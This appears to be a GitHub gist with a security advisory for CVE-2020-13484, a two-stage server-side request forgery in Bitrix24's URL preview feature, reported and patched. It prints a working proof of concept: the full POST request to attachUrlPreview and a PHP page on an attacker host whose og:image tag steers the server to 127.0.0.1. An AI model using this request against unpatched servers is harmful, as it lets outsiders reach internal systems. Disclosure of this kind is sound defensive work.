Last active
June 29, 2020 11:56
-
-
Save mariuszpoplawski/26e1fbde8f9a607478bee1de90daa329 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
CVE-2020-13484 | |
------------------------------------------ | |
Bitrix24 up to 20.0.975 allows SSRF via intranet IP address in the services/main/ajax.php?action=attachUrlPreview url parameter. If the destination URL hosts an HTML document containing '<meta name="og:image" content="', Bitrix core follows content URL of metatag. | |
------------------------------------------ | |
[Additional Information] | |
First vulnerability allows to trigger server-side request forgery to remote addresses. Second vulnerability in this functionality let us bypass restrictions and generate another request that bypassed policy of local IP block. We were able to generate requests in internal infrastructure. | |
In first stage we have found SSRF that allowed only to send remote requests. Then we manipulated the parser to parse our HTML page and generate second request to internal Bitrix core at server side. Bitrix was parsing og:image tags, this way we could triggeer second SSRF. The second request was not properly checked for "local" IP's. | |
To generate SSRF we need to send following request: | |
POST /bitrix/services/main/ajax.php?action=attachUrlPreview&show_actions=y&buildd_preview=y&die_step=3&admin_section=Y&show_cache_stat1=Y&clear_cache=Y&c=bitrix:main.urlpreview&mode=ajax&=&sessid=bd277e27ef185f42bebbb1d538e66574&signedParamsString=1.12&listSubscribeId[]=1&itemId=1&deleteSubscribe=Y&userFieldId=0&elementId=1 HTTP/1.1 | |
Host: 192.168.1.24 | |
Origin: http://192.168.1.24 | |
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.163 Safari/537.36 | |
Bx-ajax: true | |
Accept: */* | |
Referer: http://192.168.1.24/stream/ | |
Accept-Encoding: gzip, deflate | |
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7 | |
Cookie: BITRIX_SM_TIME_ZONE=-120; BITRIX_SM_SALE_UID=0; BITRIX_SM_SOUND_LOGIN_PLAYED=Y; PHPSESSID=btu7cck1irm51hsgs45akh5dma; BITRIX_SM_NCC=Y; BITRIX_SM_LOGIN=admin; BITRIX_SM_LAST_SETTINGS=;show_cache_stat=Y | |
Connection: close | |
Content-Type: application/x-www-form-urlencoded | |
Content-Length: 22 | |
url=http://OurVPSHost/index.php?id=1 | |
"OurVPSHost" host index.php file: | |
--------------------------------- | |
<?php header('Content-Type:text/html'); ?> | |
<meta name="og:image" content="http://127.0.0.1/fake_img.php"/ | |
--------------------------------- | |
Vulnerability sends second SSRF. While first one did not allow send internal request, the HTML parser parsed our og:image tag and sent internal request by redirecting Bitrix server to 127.0.0.1/fake_img.php. This way we are able to bypass the restrictions of Bitrix core. | |
------------------------------------------ | |
[VulnerabilityType Other] | |
Unauthorized server side request forgery, bypass domain whitelist | |
------------------------------------------ | |
[Vendor of Product] | |
1c-bitrix.ru, bitrix24.net | |
------------------------------------------ | |
[Affected Product Code Base] | |
Bitrix and Bitrix Cloud instances affected - up to security update (main 20.0.975), reported and fixed in latest patch | |
------------------------------------------ | |
[Affected Component] | |
Main core URLPreview function | |
------------------------------------------ | |
[Attack Type] | |
Remote | |
------------------------------------------ | |
[CVE Impact Other] | |
Force server side request forgery | |
------------------------------------------ | |
[Attack Vectors] | |
To exploit vulnerability attacker must have access to the website, valid unauth session and CSRF token - all can be generated w/o any | |
privileges. No additional requirements needed. | |
------------------------------------------ | |
[Has vendor confirmed or acknowledged the vulnerability?] | |
true | |
------------------------------------------ | |
[Discoverer] | |
Mariusz Popławski (afine.pl) | |
------------------------------------------ | |
[Reference] | |
https://www.bitrix24.com/prices/self-hosted.php | |
https://www.bitrix24.com/security/ | |
Mariusz Popławski / AFINE.com team |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment